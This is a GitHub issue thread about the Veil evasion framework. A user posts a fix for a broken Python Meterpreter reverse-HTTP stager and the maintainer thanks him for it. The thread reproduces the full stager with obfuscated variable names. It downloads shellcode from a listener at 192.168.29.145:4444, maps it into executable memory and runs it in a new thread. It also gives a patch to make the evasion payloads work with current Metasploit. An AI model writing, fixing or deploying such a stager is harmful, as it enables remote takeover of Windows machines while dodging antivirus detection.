Open pythonart opened 3 years ago
I was able to identify the issue by referring to Metasploit's code at lib/rex/payloads/meterpreter/uri_checksum.rb. Basically, Metasploit now requires a checksum of at least 40 characters. Hence, as a quick fix, I modified the payload as below: for GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,50)) to use 50 characters instead of 3 to generate a checksum.
import urllib.request, string, random, ctypes as gWBruXFY
AAAAA='84Y5NBmNT2qVo5Sh9eGL4wdPtqt8y9MEUcY4UoDbmwXv3cL6al-EM_Muv-Initf5rkfJGsg4JJHNIttk_DUWruzET6mYKkrJqZx2hPhBgoaLedUbkeEJrMSB74lB_UlWrNw96uImnS'
def mxpzRtVtg(s): return sum([ord(ch) for ch in s]) % 0x100
def zXchxRKil():
for x in range(64):
GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,**50**))
BbpKiVAkCKA = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for vddmbn in BbpKiVAkCKA:
if mxpzRtVtg(GSRBCheNtxSd + vddmbn) == 92: return GSRBCheNtxSd + vddmbn
def LlceZjXpOsmpECO(zXjfwOXx, XPpqPxgpQIzbk):
DHSKoMgpytS = urllib.request.ProxyHandler({})
uDfJcx = urllib.request.build_opener(DHSKoMgpytS)
urllib.request.install_opener(uDfJcx)
BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + zXchxRKil(), None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})
#BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + AAAAA, None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})
try:
OgWAtgNFNeTXzB = urllib.request.urlopen(BujmkFRSdXQ)
try:
if int(OgWAtgNFNeTXzB.info()["Content-Length"]) > 100000: return OgWAtgNFNeTXzB.read()
else: return ''
except: return OgWAtgNFNeTXzB.read()
except urllib.request.URLError:
return ''
def gzzEVGFKdQcsY(ozgjuhs):
if ozgjuhs != "":
ImvVOrRoqWIWK = bytearray(ozgjuhs)
tPeTLiESurd = gWBruXFY.windll.kernel32.VirtualAlloc(gWBruXFY.c_int(0),gWBruXFY.c_int(len(ImvVOrRoqWIWK)), gWBruXFY.c_int(0x3000),gWBruXFY.c_int(0x40))
tUIenYmsHfAiPZa = (gWBruXFY.c_char * len(ImvVOrRoqWIWK)).from_buffer(ImvVOrRoqWIWK)
gWBruXFY.windll.kernel32.RtlMoveMemory(gWBruXFY.c_int(tPeTLiESurd),tUIenYmsHfAiPZa, gWBruXFY.c_int(len(ImvVOrRoqWIWK)))
vHhSRkfqcncViN = gWBruXFY.windll.kernel32.CreateThread(gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.c_int(tPeTLiESurd),gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.pointer(gWBruXFY.c_int(0)))
gWBruXFY.windll.kernel32.WaitForSingleObject(gWBruXFY.c_int(vHhSRkfqcncViN),gWBruXFY.c_int(-1))
sjWtpZKZ = ''
sjWtpZKZ = LlceZjXpOsmpECO("192.168.29.145", 4444)
gzzEVGFKdQcsY(sjWtpZKZ)
I suggest the source code for the files below be modified to match the URI generator method in lib/rex/payloads/meterpreter/uri_checksum.rb: Veil/tools/evasion/payloads/python/meterpreter/rev_http.py and Veil/tools/evasion/payloads/python/meterpreter/rev_https.py.
A temporary fix would be to change the line below, modifying the value 3 to any number greater than 40. payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n"
Hey, thanks for sending this patch over. Appreciate it! Any chance you want to submit it as a pull request, just so you get the credit?
Hi Chris, I am not familiar with submissions. Kindly do it for me. I am not keen on getting the credit.
Veil version
Veil | [Version]: 3.1.14
OS Used - all info (architecture, linux flavor, etc)
Linux 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
How did you install Veil? (Apt, Clone from Github, etc.)
Apt
Did you run the setup script?
Yes
Pastebin link to error you are encountering (include console actions you took prior to error)
https://pastebin.pl/view/105eae92
Expected behavior
Successful upload of the stager, followed by a Windows Meterpreter session on the attack machine.
Any additional info you want to tell me